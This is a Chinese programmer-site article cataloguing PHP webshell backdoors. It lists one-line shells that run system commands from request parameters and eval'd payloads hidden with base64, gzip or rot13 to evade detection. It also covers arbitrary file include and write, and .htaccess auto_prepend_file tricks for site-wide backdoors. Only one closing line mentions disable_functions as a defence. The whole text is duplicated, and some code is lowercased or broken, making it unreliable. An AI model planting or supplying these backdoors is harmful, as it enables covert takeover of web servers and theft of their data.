PHP木马大全 一句话的PHP木马的防范
程序员文章站
2022-07-10 13:17:40
php后门木马对大家来说一点都不陌生吧,但是它的种类您又知多少呢... 12-06-28...
php后门木马常用的函数大致上可分为四种类型:
1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open
2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
3. 文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite
4. .htaccess: sethandler, auto_prepend_file, auto_append_file
1. 执行系统命令:
system 函数
//test.php?cmd=ls
system($_get[cmd]);
passthru 函数
//test.php?cmd=ls
passthru($_get[cmd]);
shell_exec 函数
//test.php?cmd=ls
echo shell_exec($_get[cmd]);
exec 函数
//test.php?cmd=ls
$arr = array();
exec($_get[cmd],$arr);
print_r($arr);
popen 函数
//test.php?cmd=ls
$handle = popen('$_get[cmd], 'r');
$read = fread($handle, 2096);
echo $read;
pclose($handle);
proc_open 函数
//test.php?cmd=ls
$descriptorspec = array(
0 => array('pipe', 'r'),
1 => array('pipe', 'w'),
2 => array('pipe', 'w'),
);
$proc = @proc_open($_get[cmd], $descriptorspec, $pipes);
fclose($pipes[0]);
$output = array();
while (!feof($pipes[1])) array_push($output, rtrim(fgets($pipes[1],1024),"\n"));
print_r($output);
2. 代码执行与加密:
eval 函数
//最常见的一句话木马
eval($_post[cmd]);
base64_decode 函数
//为了免杀及隐藏而加密代码
//密文: eval($_post['cmd']);
eval(base64_decode('zxzhbcgkx1bpu1rbj2ntzcddkts='));
gzinflate 函数
//为了免杀及隐藏而加密代码
//密文: eval($_post['cmd']);
eval(gzinflate(base64_decode('sy1lznfqiq/wdw6jvk/otvgp1bqgaa==')));
gzuncompress 函数
//为了免杀及隐藏而加密代码
//密文: eval($_post['cmd']);
eval(gzuncompress(base64_decode('ejxlluvm0vcjd/apdolwt85nuy/vtayarqugoa==')));
gzdecode 函数
//为了免杀及隐藏而加密代码
//密文: eval($_post['cmd']);
eval(gzdecode(base64_decode('h4siaaaaaaaaa0sts8zruikp8a8oivzpzk1rj9w0bga5yqfafaaaaa==')));
str_rot13 函数
//为了免杀及隐藏而加密代码
//密文: eval($_post[cmd]);
eval(str_rot13('riny($_cbfg[pzq]);'));
assert 函数
//类似eval函数
assert($_post[cmd]);
call_user_func 函数
//使用call_user_func调用assert
call_user_func('assert',$_post[cmd]);
call_user_func 函数
//使用call_user_func调用任意函数
//test.php?a=assert&cmd=phpinfo()
call_user_func($_get[a],$_request[cmd]);
组合代码
//组合方式调用任意函数
//test.php?a=assert&cmd=phpinfo()
$_get[a]($_request[cmd]);
3. 文件包含与生成:
require 函数
//包含任意文件
//test.php?file=123.jpg
require($_get[file]);
require_once 函数
//包含任意文件
//test.php?file=123.jpg
require_once($_get[file]);
include 函数
//包含任意文件 www.jb51.net
//test.php?file=123.jpg
include($_get[file]);
include_once 函数
//包含任意文件
//test.php?file=123.jpg
include_once($_get[file]);
file_get_contents 函数
//读取任意文件
//test.php?f=config.inc.php
echo file_get_contents($_get['f']);
file_put_contents 函数
//生成任意内容文件
//a=test.php&b=
file_put_contents($_get[a],$_get[b]);
fputs 函数
//生成任意内容文件
//a=test.php&b=
fputs(fopen($_get[a],"w"),$_get[b]);
4. .htaccess:
sethandler
//可将php代码存于非php后缀文件,例: x.jpg
//将以下代码写入.htaccess中
//连接x.jpg即可启动后门木马出处www.admin8.us
sethandler application/x-httpd-php
auto_prepend_file
//可将php代码存于非php后缀文件,例: 123.gif
//将以下代码写入.htaccess中, 文件路径必须是绝对路径
//访问网站上任何php文件都会启动该php后门木马
//可在不更改站点源代码的情况下记录所有$_request的值,也可批量挂马
php_value auto_prepend_file c:/apache2/htdocs/123.gif
auto_append_file
//类似auto_prepend_file
//可将php代码存于非php后缀文件,例: 123.gif
//将以下代码写入.htaccess中, 文件路径必须是绝对路径
//访问网站上任何php文件都会启动该php后门木马
php_value auto_append_file c:/apache2/htdocs/123.gif
防范方法:通过禁止危险函数 php.ini中设置disable_functions详情可以参考下
1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open
2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
3. 文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite
4. .htaccess: sethandler, auto_prepend_file, auto_append_file
1. 执行系统命令:
system 函数
//test.php?cmd=ls
system($_get[cmd]);
passthru 函数
//test.php?cmd=ls
passthru($_get[cmd]);
shell_exec 函数
//test.php?cmd=ls
echo shell_exec($_get[cmd]);
exec 函数
//test.php?cmd=ls
$arr = array();
exec($_get[cmd],$arr);
print_r($arr);
popen 函数
//test.php?cmd=ls
$handle = popen('$_get[cmd], 'r');
$read = fread($handle, 2096);
echo $read;
pclose($handle);
proc_open 函数
//test.php?cmd=ls
$descriptorspec = array(
0 => array('pipe', 'r'),
1 => array('pipe', 'w'),
2 => array('pipe', 'w'),
);
$proc = @proc_open($_get[cmd], $descriptorspec, $pipes);
fclose($pipes[0]);
$output = array();
while (!feof($pipes[1])) array_push($output, rtrim(fgets($pipes[1],1024),"\n"));
print_r($output);
2. 代码执行与加密:
eval 函数
//最常见的一句话木马
eval($_post[cmd]);
base64_decode 函数
//为了免杀及隐藏而加密代码
//密文: eval($_post['cmd']);
eval(base64_decode('zxzhbcgkx1bpu1rbj2ntzcddkts='));
gzinflate 函数
//为了免杀及隐藏而加密代码
//密文: eval($_post['cmd']);
eval(gzinflate(base64_decode('sy1lznfqiq/wdw6jvk/otvgp1bqgaa==')));
gzuncompress 函数
//为了免杀及隐藏而加密代码
//密文: eval($_post['cmd']);
eval(gzuncompress(base64_decode('ejxlluvm0vcjd/apdolwt85nuy/vtayarqugoa==')));
gzdecode 函数
//为了免杀及隐藏而加密代码
//密文: eval($_post['cmd']);
eval(gzdecode(base64_decode('h4siaaaaaaaaa0sts8zruikp8a8oivzpzk1rj9w0bga5yqfafaaaaa==')));
str_rot13 函数
//为了免杀及隐藏而加密代码
//密文: eval($_post[cmd]);
eval(str_rot13('riny($_cbfg[pzq]);'));
assert 函数
//类似eval函数
assert($_post[cmd]);
call_user_func 函数
//使用call_user_func调用assert
call_user_func('assert',$_post[cmd]);
call_user_func 函数
//使用call_user_func调用任意函数
//test.php?a=assert&cmd=phpinfo()
call_user_func($_get[a],$_request[cmd]);
组合代码
//组合方式调用任意函数
//test.php?a=assert&cmd=phpinfo()
$_get[a]($_request[cmd]);
3. 文件包含与生成:
require 函数
//包含任意文件
//test.php?file=123.jpg
require($_get[file]);
require_once 函数
//包含任意文件
//test.php?file=123.jpg
require_once($_get[file]);
include 函数
//包含任意文件 www.jb51.net
//test.php?file=123.jpg
include($_get[file]);
include_once 函数
//包含任意文件
//test.php?file=123.jpg
include_once($_get[file]);
file_get_contents 函数
//读取任意文件
//test.php?f=config.inc.php
echo file_get_contents($_get['f']);
file_put_contents 函数
//生成任意内容文件
//a=test.php&b=
file_put_contents($_get[a],$_get[b]);
fputs 函数
//生成任意内容文件
//a=test.php&b=
fputs(fopen($_get[a],"w"),$_get[b]);
4. .htaccess:
sethandler
//可将php代码存于非php后缀文件,例: x.jpg
//将以下代码写入.htaccess中
//连接x.jpg即可启动后门木马出处www.admin8.us
sethandler application/x-httpd-php
auto_prepend_file
//可将php代码存于非php后缀文件,例: 123.gif
//将以下代码写入.htaccess中, 文件路径必须是绝对路径
//访问网站上任何php文件都会启动该php后门木马
//可在不更改站点源代码的情况下记录所有$_request的值,也可批量挂马
php_value auto_prepend_file c:/apache2/htdocs/123.gif
auto_append_file
//类似auto_prepend_file
//可将php代码存于非php后缀文件,例: 123.gif
//将以下代码写入.htaccess中, 文件路径必须是绝对路径
//访问网站上任何php文件都会启动该php后门木马
php_value auto_append_file c:/apache2/htdocs/123.gif
防范方法:通过禁止危险函数 php.ini中设置disable_functions详情可以参考下